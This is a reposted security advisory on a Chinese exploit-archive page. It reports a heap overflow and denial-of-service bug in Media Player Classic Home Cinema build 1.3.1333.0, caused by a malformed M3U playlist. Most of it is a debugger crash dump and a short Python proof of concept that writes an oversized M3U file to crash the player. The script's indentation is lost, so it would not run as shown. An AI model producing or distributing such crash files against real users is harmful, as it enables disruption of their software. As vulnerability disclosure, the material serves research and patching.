Media Player Classic Heap Overflow/DoS Vulnerability

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Media Player Classic Heap Overflow/DoS Vulnerability

来源：http://darshanams.blogspot.com 作者：Darshanam 发布时间：2010-07-27

Tested on:
Media Player Classic - Home Cinema
Build number: 1.3.1333.0
MPC Compiler: VS 2008
FFmpeg Compiler: GCC 4.4.1

###################CRASH REPORT START##################
ModLoad: 77be0000 77bf5000   C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000   C:\WINDOWS\system32\midimap.dll
ModLoad: 73ee0000 73ee4000   C:\WINDOWS\system32\KsUser.dll
ModLoad: 10000000 100fb000   C:\Program Files\K-Lite Codec
Pack\Filters\vsfilter.dll
ModLoad: 590b0000 590ce000   C:\WINDOWS\system32\wmpasf.dll
ModLoad: 71b20000 71b32000   C:\WINDOWS\system32\MPR.dll
ModLoad: 6bf50000 6bfcd000   C:\WINDOWS\system32\dxmasf.dll
ModLoad: 02530000 0257f000   C:\WINDOWS\system32\DRMClien.DLL
(6dc.cec): C++ EH exception - code e06d7363 (!!! second chance !!!)
............................... ISSUE
eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=01c2f36c
edi=003fd08c
eip=7c812aeb esp=01c2f2e0 ebp=01c2f334 iopl=0         nv up ei pl nz na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\WINDOWS\system32\kernel32.dll -
kernel32!RaiseException+0x52:
7c812aeb 5e              pop     esi
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:004> g
WARNING: Continuing a non-continuable exception
(6dc.cec): Break instruction exception - code 80000003 (first chance)
eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=00000000
edi=003fd08c
eip=0071d14b esp=01c2f37c ebp=01c2f39c iopl=0         nv up ei pl nz na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000206
mpc_hc+0x31d14b:
0071d14b cc              int     3

###################CRASH REPORT END##################

For images related to the vulnerability refer my blog
http://darshanams.blogspot.com

##########PoC Start################
print("\n*****Program need to be run on Python 3.1*****")
print ("""Media Player Classic - Home Cinema 1.3.1333.0 M3U File DoS
(0-Day)\r\n\r\nTested on:\nWindows XP SP3\n
Media Player Classic - Home Cinema\n\t\t Build number: 1.3.1333.0\n\t\t
MPC Compiler: VS 2008\n\t\t FFmpeg Compiler: GCC 4.4.1\n""")

head = "EXTM3U"
buf = "D" * 1000

mal_buf = head + buf
#print ("mal_buf:",mal_buf)
try:
mpc_mal = open("mpc_m3u_crash.m3u",'w')
mpc_mal.write (mal_buf)
mpc_mal.close()
print ("File Created Successfully: mpc_m3u_crash.m3u\n")
except:
print ("Cannnot Create M3U File\n")

print ("[+] Found and Coded by: Praveen Darshanam\r\n")
##########PoC End################

Best Regards,
Praveen Darshanam,
Security Researcher

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告